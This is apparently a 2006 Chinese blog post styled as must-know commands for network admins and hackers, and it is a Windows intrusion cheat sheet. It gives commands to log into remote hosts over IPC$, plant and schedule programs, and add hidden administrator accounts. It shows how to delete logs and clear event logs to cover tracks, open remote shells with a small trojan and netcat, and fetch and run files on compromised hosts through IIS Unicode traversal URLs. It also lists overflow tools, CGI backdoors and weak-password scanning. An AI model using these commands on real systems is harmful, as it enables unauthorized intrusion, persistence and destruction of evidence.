網管和黑客都必須知道的命令 |
? 常用的幾條NET命令:?
(與遠程主機建立空管連接)?net?use?\\IP地址\ipc$?""?/use:""?
(以管理員身份登錄遠程主機)?net?use?\\IP地址\ipc$?"密碼"?/use:"Administrator"?
(傳送文件到遠程主機WINNT目錄下)copy?本機目錄路徑\程序?\\IP地址\admin$?
(查看遠程主機時間)?net?time?\\IP地址?
(定時啟動某個程序)?at?\\IP地址?02:18?readme.exe?
(查看共享)?net?view?\\IP地址?
(查看netbios工作組列表)?nbtstat?-A?IP地址?
(將遠程主機C盤映射為自己的F盤)?net?use?f:?\\IP地址\c$?""/user:"Administrator"?
(這兩條把自己增加到管理員組):?net?user?用戶名?密碼?/add?
net?localgroup?Administrators?用戶名?/add?
(斷開連接)?net?use?\\IP地址\ipc$?/delete?
掃尾:?
del?C:\winnt\system32\logfiles\*.*?
del?C:\winnt\ssytem32\config\*.evt?
del?C:\winnt\system32\dtclog\*.*?
del?C:\winnt\system32\*.log?
del?C:\winnt\system32\*.txt?
del?C:\winnt\*.txt?
del?C:\winnt\*.log?
一、netsvc.exe?
下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:?
netsvc?/list?\\IP地址?
netsvc?schedule?\\IP地址?/query?
netsvc?\\IP地址?schedule?/start?
二、OpenTelnet.exe?
遠程啟動主機的Telnet服務,并綁定端口到7878,例如:?
OpenTelnet?\\IP地址?用戶名?密碼?1?7878?
然后就可以telnet到主機的7878端口,進入DOS方式下:?
telnet?IP地址?7878?
三、winshell.exe?
一個非常小的木馬(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>后,可打下面的命令:?
p?Path?(查看winshell主程序的路徑信息)?
b?reBoot?(重新啟動機器)?
d?shutDown?(關閉機器)?
s?Shell?(執行后你就會看到可愛的“C:\>”)?
x?eXit?(退出本次登錄會話,此命令并不終止winshell的運行)?
CMD>?http://.../srv.exe?(通過http下載其他網站上的文件到運行winshell的機器上)?
四、3389登陸器,GUI方式登錄遠程主機的?
五、elsave.exe?
事件日志清除工具?
elsave?-s?\\IP地址?-l?"application"?-C?
elsave?-s?\\IP地址?-l?"system"?-C?
elsave?-s?\\IP地址?-l?"security"?-C?
執行后成功清除應用程序日志,系統日志,安全日志?
六、hbulot.exe?
開啟win2kserver和winxp的3389服務?
hbulot?[/r]?
使用/r表示安裝完成后自動重起目標使設置生效。?
七、nc.exe(netcat.exe)?
一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。?
想要連接到某處:?nc?[-options]?hostname?port[s]?[ports]?...?
綁定端口等待連接:?nc?-l?-p?port?[-options]?[hostname]?[port]?
參數:?
-e?prog?程序重定向,一旦連接,就執行?[危險!!]?
-g?gateway?source-routing?hop?point[s],?up?to?8?
-G?num?source-routing?pointer:?4,?8,?12,?...?
-h?幫助信息?
-i?secs?延時的間隔?
-l?監聽模式,用于入站連接?
-n?指定數字的IP地址,不能用hostname?
-o?file?記錄16進制的傳輸?
-p?port?本地端口號?
-r?任意指定本地及遠程端口?
-s?addr?本地源地址?
-u?UDP模式?
-v?詳細輸出——用兩個-v可得到更詳細的內容?
-w?secs?timeout的時間?
-z?將輸入輸出關掉——用于掃描時? 八、TFTPD32.EXE?
把自己的電腦臨時變為一臺FTP服務器,讓肉雞來下載文件,tftp命令要在肉雞上執行,通常要利用Unicode漏洞或telnet到肉雞,例如:?
http://IP地址/s?cripts/..%255c..%255c/winnt/system32/cmd.exe?/c?tftp?-i?本機IP地址?get?文件名?c:\winnt\system32\文件名?
然后可以直接令文件運行:?
http://IP地址/s?cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名?
九、prihack.exe是IIS的printer遠程緩沖區溢出工具。idqover.exe是溢出idq的,選擇“溢出后在一個端口監聽”,然后用telnet連接它的監聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執行。xploit.exe是一個圖形界面的ida溢出,成功以后winxp下需要打winxp。?
一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行權限的目錄。然后用IE瀏覽器連接。?
一、一?Xscan命令行運行參數說明:?
在檢測過程中,按"[空格]"鍵可以查看各線程狀態及掃描進度,按"q"鍵保存當前數據后提前退出程序,按"<ctrl+c>"強行關閉程序。?
1.命令格式:?xscan?-host?<起始IP>[-<終止IP>]?<檢測項目>?[其他選項]?
xscan?-file?<主機列表文件名>?<檢測項目>?[其他選項]?
其中<檢測項目>?含義如下:?
-port?:?檢測常用服務的端口狀態(可通過\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"項定制待檢測端口列表);?
-ftp?:?檢測FTP弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);?
-ntpass?:?檢測NT-Server弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);?
-cgi?:?檢測CGI漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);?
-iis?:?檢測IIS漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);?
[其他選項]?含義如下:?
-v:?顯示詳細掃描進度?
-p:?跳過Ping不通的主機?
-o:?跳過沒有檢測到開放端口的主機?
-t?<并發線程數量[,并發主機數量]>:?指定最大并發線程數量和并發主機數量,?默認數量為100,10?
|
posted on 2006-03-25 18:04
MEYE 閱讀(337)
評論(0) 編輯 收藏